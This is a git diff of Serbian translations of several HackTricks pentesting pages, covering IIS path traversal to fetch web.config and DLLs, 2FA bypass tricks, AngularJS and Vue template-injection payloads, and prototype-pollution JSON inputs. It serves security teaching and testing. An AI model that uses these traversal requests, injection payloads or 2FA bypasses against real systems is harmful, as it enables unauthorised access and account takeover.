Kao sažetak, postoji nekoliko web.config datoteka unutar foldera aplikacije sa referencama na "**assemblyIdentity**" datoteke i "**namespaces**". Sa ovim informacijama je moguće znati **gde se nalaze izvršne datoteke** i preuzeti ih.\
|
||||
Iz **preuzetih Dll-ova** takođe je moguće pronaći **nove namespaces** gde biste trebali pokušati pristupiti i dobiti web.config datoteku kako biste pronašli nove namespaces i assemblyIdentity.\
|
||||
Takođe, datoteke **connectionstrings.config** i **global.asax** mogu sadržati zanimljive informacije.\\
|
||||
{% endhint %}
|
||||
|
||||
U **.Net MVC aplikacijama**, fajl **web.config** igra ključnu ulogu specificiranjem svakog binarnog fajla na koji se aplikacija oslanja putem **"assemblyIdentity"** XML tagova.
|
||||
U **.Net MVC aplikacijama**, datoteka **web.config** igra ključnu ulogu specificiranjem svake binarne datoteke na koju se aplikacija oslanja putem **"assemblyIdentity"** XML oznaka.
|
||||
|
||||
### **Istraživanje Binarnih Fajlova**
|
||||
### **Istraživanje Binarnih Datoteka**
|
||||
|
||||
Primer pristupa fajlu **web.config** je prikazan ispod:
|
||||
Primer pristupa **web.config** datoteci je prikazan ispod:
|
||||
```markup
|
||||
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
|
@ -105,7 +105,7 @@ Ovaj zahtev otkriva različite postavke i zavisnosti, kao što su:
|
|||
* Postavke modula **System.webServer**
|
||||
* Veze sklopova za izvršavanje za brojne biblioteke poput **Microsoft.Owin**, **Newtonsoft.Json** i **System.Web.Mvc**
|
||||
|
||||
Ove postavke ukazuju da se određene datoteke, poput **/bin/WebGrease.dll**, nalaze unutar fascikle aplikacije /bin.
|
||||
Ove postavke ukazuju da se određene datoteke, poput **/bin/WebGrease.dll**, nalaze unutar /bin fascikle aplikacije.
|
||||
|
||||
### **Datoteke u korenskom direktorijumu**
|
||||
|
||||
|
@ -120,14 +120,14 @@ Host: example-mvc-application.minded
|
|||
```
|
||||
### **Preuzimanje DLL-ova**
|
||||
|
||||
Pomen o prilagođenom imenskom prostoru ukazuje na DLL nazvan "**WebApplication1**" koji se nalazi u /bin direktorijumu. Nakon toga, prikazan je zahtev za preuzimanje **WebApplication1.dll** fajla:
|
||||
Pomen prilagođenog imenskog prostora ukazuje na DLL nazvan "**WebApplication1**" koji se nalazi u /bin direktorijumu. Nakon toga, prikazan je zahtev za preuzimanje **WebApplication1.dll** fajla:
|
||||
```markup
|
||||
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
Ovo ukazuje na prisustvo drugih bitnih DLL-ova, poput **System.Web.Mvc.dll** i **System.Web.Optimization.dll**, u /bin direktorijumu.
|
||||
Ovo sugeriše prisustvo drugih bitnih DLL-ova, poput **System.Web.Mvc.dll** i **System.Web.Optimization.dll**, u /bin direktorijumu.
|
||||
|
||||
U scenariju gde DLL uvozi namespace pod nazivom **WebApplication1.Areas.Minded**, napadač može zaključiti postojanje drugih web.config fajlova na predvidljivim putanjama, poput **/area-name/Views/**, koji sadrže specifične konfiguracije i reference ka drugim DLL-ovima u /bin folderu. Na primer, zahtev ka **/Minded/Views/web.config** može otkriti konfiguracije i namespace-ove koji ukazuju na prisustvo još jednog DLL-a, **WebApplication1.AdditionalFeatures.dll**.
|
||||
U scenariju gde DLL uvozi namespace pod nazivom **WebApplication1.Areas.Minded**, napadač može zaključiti postojanje drugih web.config fajlova na predvidljivim putanjama, poput **/ime-oblasti/Views/**, koji sadrže specifične konfiguracije i reference ka drugim DLL-ovima u /bin folderu. Na primer, zahtev za **/Minded/Views/web.config** može otkriti konfiguracije i namespace-ove koji ukazuju na prisustvo još jednog DLL-a, **WebApplication1.AdditionalFeatures.dll**.
|
||||
|
||||
### Zajednički fajlovi
|
||||
|
||||
|
@ -217,7 +217,7 @@ Ako vidite grešku kao što je sledeća:
|
|||
To znači da server **nije primio tačno ime domena** unutar zaglavlja Host.\
|
||||
Da biste pristupili veb stranici, možete pogledati posluženi **SSL sertifikat** i možda pronaći ime domena/poddomena tamo. Ako ga nema, možda ćete morati **bruteforce VHosts** dok ne pronađete tačan.
|
||||
|
||||
## Stare ranjivosti IIS-a vredne istraživanja
|
||||
## Stare ranjivosti IIS-a koje vredi istražiti
|
||||
|
||||
### Microsoft IIS tilde karakter "\~" Ranjivost/Funkcija - Otkrivanje kratkog imena datoteke/foldera
|
||||
|
||||
|
@ -242,7 +242,7 @@ Možete pokušati **pomešati** ovu **ranjivost** i prethodnu kako biste pronaš
|
|||
|
||||
ASP.NET uključuje režim debagovanja, a njegova datoteka se zove `trace.axd`.
|
||||
|
||||
Čuva veoma detaljan zapis svih zahteva upućenih aplikaciji tokom određenog vremenskog perioda.
|
||||
Ona čuva veoma detaljan zapis svih zahteva upućenih aplikaciji tokom određenog vremenskog perioda.
|
||||
|
||||
Ove informacije uključuju udaljene IP adrese klijenata, ID-ove sesija, sve kolačiće zahteva i odgovora, fizičke putanje, informacije o izvornom kodu, i potencijalno čak korisnička imena i lozinke.
|
||||
|
||||
|
@ -255,7 +255,7 @@ Ove informacije uključuju udaljene IP adrese klijenata, ID-ove sesija, sve kola
|
|||
ASPXAUTH koristi sledeće informacije:
|
||||
|
||||
* **`validationKey`** (string): heksadecimalni ključ koji se koristi za validaciju potpisa.
|
||||
* **`decryptionMethod`** (string): (podrazumevano "AES").
|
||||
* **`decryptionMethod`** (string): (podrazumevano “AES”).
|
||||
* **`decryptionIV`** (string): heksadecimalni inicijalizacioni vektor (podrazumevano vektor nula).
|
||||
* **`decryptionKey`** (string): heksadecimalni ključ koji se koristi za dešifrovanje.
|
||||
|
||||
|
@ -284,13 +284,13 @@ HTTP/1.1 401 Unauthorized
|
|||
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
|
||||
HTTP/1.1 200 OK
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -302,7 +302,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
|
|
@ -9,30 +9,30 @@ Drugi načini podrške HackTricks-u:
|
|||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## **Tehnike Bajpasovanja Unapređene Dvostruke Autentifikacije**
|
||||
## **Tehnike poboljšanog zaobilaženja Dvostruke Autentifikacije**
|
||||
|
||||
### **Direktan Pristup Krajnjoj Tački**
|
||||
|
||||
Zaobiđite 2FA, pristupite narednoj krajnjoj tački direktno, poznavanje putanje je ključno. Ako ne uspete, promenite **Referrer header** da imitirate navigaciju sa stranice za verifikaciju 2FA.
|
||||
Da biste zaobišli 2FA, pristupite narednoj krajnjoj tački direktno, znajući da je putanja ključna. Ako ne uspete, promenite **Referrer header** da imitirate navigaciju sa stranice za proveru 2FA.
|
||||
|
||||
### **Ponovna Upotreba Tokena**
|
||||
|
||||
|
@ -40,7 +40,7 @@ Ponovna upotreba prethodno korišćenih tokena za autentifikaciju unutar naloga
|
|||
|
||||
### **Korišćenje Neiskorišćenih Tokena**
|
||||
|
||||
Pokušajte izvući token iz svog naloga kako biste zaobišli 2FA u drugom nalogu.
|
||||
Pokušajte izvući token iz svog sopstvenog naloga kako biste zaobišli 2FA u drugom nalogu.
|
||||
|
||||
### **Otkrivanje Tokena**
|
||||
|
||||
|
@ -76,7 +76,7 @@ Spori napad brute force je moguć gde postoje ograničenja brzine toka bez opšt
|
|||
|
||||
Ponovno slanje koda resetuje ograničenje brzine, olakšavajući nastavak napada brute force.
|
||||
|
||||
#### **Obilaženje Ograničenja Brzine Na Klijentskoj Strani**
|
||||
#### **Obilaženje Ograničenja Brzine na Klijentskoj Strani**
|
||||
|
||||
Dokument detaljno opisuje tehnike za zaobilaženje ograničenja brzine na klijentskoj strani.
|
||||
|
||||
|
@ -90,7 +90,7 @@ Prekomerno slanje kodova putem SMS-a donosi troškove kompaniji, mada ne zaobila
|
|||
|
||||
#### **Beskonačna Regeneracija OTP-a**
|
||||
|
||||
Beskonačna generacija OTP-a sa jednostavnim kodovima omogućava brute force pokušajem ponovnog pokušaja malog skupa kodova.
|
||||
Beskonačna generacija OTP-a sa jednostavnim kodovima omogućava brute force pokušajem ponovnog pokušaja male grupe kodova.
|
||||
|
||||
### **Eksploatacija Trke Uslova**
|
||||
|
||||
|
@ -108,7 +108,7 @@ Pogađanje vrednosti kolačića "zapamti me" može zaobići ograničenja.
|
|||
|
||||
#### **Imitacija IP Adrese**
|
||||
|
||||
Imitacija IP adrese žrtve putem **X-Forwarded-For** zaglavlja može zaobići ograničenja.
|
||||
Imitiranje IP adrese žrtve putem **X-Forwarded-For** zaglavlja može zaobići ograničenja.
|
||||
|
||||
### **Korišćenje Starijih Verzija**
|
||||
|
||||
|
@ -124,7 +124,7 @@ Starije verzije API-ja, naznačene putanjama direktorijuma /v\*/, mogu biti ranj
|
|||
|
||||
Završavanje postojećih sesija prilikom aktivacije 2FA štiti naloge od neovlašćenog pristupa iz kompromitovanih sesija.
|
||||
|
||||
### **Propusti Kontrole Pristupa sa Rezervnim Kodovima**
|
||||
### **Propusti u Kontroli Pristupa sa Rezervnim Kodovima**
|
||||
|
||||
Odmah generisanje i potencijalno neovlašćeno preuzimanje rezervnih kodova prilikom aktivacije 2FA, posebno sa CORS greškama/XSS ranjivostima, predstavlja rizik.
|
||||
|
||||
|
@ -134,13 +134,26 @@ Otkrivanje osetljivih informacija (npr. broj telefona) na stranici za verifikaci
|
|||
|
||||
### **Onemogućavanje Resetovanja Lozinke 2FA**
|
||||
|
||||
Proces koji demonstrira potencijalnu metodu zaobilaženja uključuje kreiranje naloga, aktivaciju 2FA, resetovanje lozinke i naknadno prijavljivanje bez zahteva za 2FA.
|
||||
Proces koji demonstrira potencijalnu metodu zaobilaženja uključuje kreiranje naloga, aktivaciju 2FA, resetovanje lozinke i naknadnu prijavu bez zahteva za 2FA.
|
||||
|
||||
### **Lažni Zahtevi**
|
||||
|
||||
Korišćenje lažnih zahteva za prikrivanje pokušaja brute force ili zavaravanje mehanizama ograničenja brzine dodaje još jedan sloj strategijama zaobilaženja. Oblikovanje takvih zahteva zahteva nijansirano razumevanje sigurnosnih mera aplikacije i ponašanja ograničenja brzine.
|
||||
Korišćenje lažnih zahteva za prikrivanje pokušaja brute force ili zavaravanje mehanizama ograničenja brzine dodaje još jedan sloj strategijama zaobilaženja. Izrada takvih zahteva zahteva nijansirano razumevanje sigurnosnih mera aplikacije i ponašanja ograničenja brzine.
|
||||
|
||||
## Reference
|
||||
|
||||
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
|
||||
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
||||
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,13 +12,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -28,15 +28,15 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
# Rezime
|
||||
|
||||
To je kao [**Server Side Template Injection**](ssti-server-side-template-injection/), ali na **klijentskoj strani**. **SSTI** vam može omogućiti da **izvršite kod** na udaljenom serveru, dok bi **CSTI** mogao da vam omogući da **izvršite proizvoljni JavaScript** kod u pretraživaču žrtve.
|
||||
To je kao [**Server Side Template Injection**](ssti-server-side-template-injection/) ali na **klijentskoj strani**. **SSTI** vam može omogućiti da **izvršite kod** na udaljenom serveru, dok bi **CSTI** mogao omogućiti izvršavanje proizvoljnog JavaScript koda u pretraživaču žrtve.
|
||||
|
||||
**Testiranje** ove ranjivosti je veoma **slično** kao i u slučaju **SSTI**, interpretator očekuje **šablon** i izvršiće ga. Na primer, sa payload-om poput `{{ 7-7 }}`, ako je aplikacija **ranjiva**, videćete `0`, a ako nije, videćete original: `{{ 7-7 }}`
|
||||
|
||||
# AngularJS
|
||||
|
||||
AngularJS je široko korišćen JavaScript okvir koji interaguje sa HTML-om putem atributa poznatih kao direktive, od kojih je jedna od značajnijih **`ng-app`**. Ova direktiva omogućava AngularJS-u da obradi HTML sadržaj, omogućavajući izvršavanje JavaScript izraza unutar dvostrukih vitičastih zagrada.
|
||||
AngularJS je široko korišćeni JavaScript okvir koji interaguje sa HTML-om putem atributa poznatih kao direktive, od kojih je jedna od značajnijih **`ng-app`**. Ova direktiva omogućava AngularJS-u da obradi HTML sadržaj, omogućavajući izvršavanje JavaScript izraza unutar dvostrukih vitičastih zagrada.
|
||||
|
||||
U scenarijima gde se korisnički unos dinamički ubacuje u telo HTML označeno sa `ng-app`, moguće je izvršiti proizvoljni JavaScript kod. To se može postići iskorišćavanjem sintakse AngularJS-a unutar unosa. U nastavku su primeri koji pokazuju kako se može izvršiti JavaScript kod:
|
||||
U scenarijima gde se korisnički unos dinamički ubacuje u telo HTML označeno sa `ng-app`, moguće je izvršiti proizvoljan JavaScript kod. To se može postići iskorišćavanjem sintakse AngularJS-a unutar unosa. U nastavku su primeri koji pokazuju kako se može izvršiti JavaScript kod:
|
||||
```javascript
|
||||
{{$on.constructor('alert(1)')()}}
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
|
@ -67,7 +67,7 @@ Jedan zaista dobar post o CSTI u VUE može se pronaći na [https://portswigger.n
|
|||
```
|
||||
{{_openBlock.constructor('alert(1)')()}}
|
||||
```
|
||||
Kredit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
|
||||
Zasluga: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
|
||||
|
||||
## **V2**
|
||||
```
|
||||
|
@ -99,13 +99,13 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
|||
|
||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark webu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera koji krade podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji krade informacije.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -119,8 +119,8 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -28,13 +28,13 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
---
|
||||
|
||||
## Posluži XSS odgovore
|
||||
## Poslužite XSS odgovore
|
||||
|
||||
**Za dalje detalje [pogledajte originalno istraživanje](https://portswigger.net/research/server-side-prototype-pollution)**
|
||||
|
||||
### Promeni JSON content-type u HTML
|
||||
### Promenite JSON content-type u HTML
|
||||
|
||||
U Express aplikaciji koristeći **JSON content type odgovor** i reflektujući JSON:
|
||||
U Express aplikaciji koja koristi **JSON content type odgovor** i reflektuje JSON:
|
||||
```javascript
|
||||
app.use(bodyParser.json({type: 'application/json'}));
|
||||
app.post('/', function(req, res){
|
||||
|
@ -104,7 +104,7 @@ Kada aplikacija uključi objekat u svoj odgovor, kreiranje atributa sa **neobič
|
|||
```json
|
||||
{"unusualName":"value","__proto__":"test"}
|
||||
```
|
||||
Osim toga, u scenarijima gde se koristi biblioteka poput Lodash-a, postavljanje svojstva i putem proto-izmena (PP) i direktno unutar objekta nudi još jedan dijagnostički pristup. Ako je takvo svojstvo izostavljeno iz odgovora, to sugeriše da Lodash proverava postojanje svojstva u ciljnom objektu pre spajanja:
|
||||
Takođe, u scenarijima u kojima se koristi biblioteka poput Lodash-a, postavljanje svojstva i putem zagađenja prototipa (PP) i direktno unutar objekta nudi još jedan dijagnostički pristup. Ako je takvo svojstvo izostavljeno iz odgovora, to sugeriše da Lodash proverava postojanje svojstva u ciljnom objektu pre spajanja:
|
||||
```javascript
|
||||
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
|
||||
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
|
||||
|
@ -114,7 +114,7 @@ Osim toga, u scenarijima gde se koristi biblioteka poput Lodash-a, postavljanje
|
|||
### Dozvoli tačke
|
||||
|
||||
Postoji opcija u Express-u koja vam omogućava da **kreirate objekte iz parametara upita u nizu**.\
|
||||
Svakako biste je mogli koristiti u nizu grešaka da iskoristite **ranjivost prototipa zagađenja**.
|
||||
Svakako biste je mogli koristiti u nizu grešaka da iskoristite **ranjivost prototipa pollution**.
|
||||
```json
|
||||
{"__proto__":{"allowDots":true}}
|
||||
```
|
||||
|
@ -125,13 +125,13 @@ Svakako biste je mogli koristiti u nizu grešaka da iskoristite **ranjivost prot
|
|||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomverom koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -145,8 +145,8 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
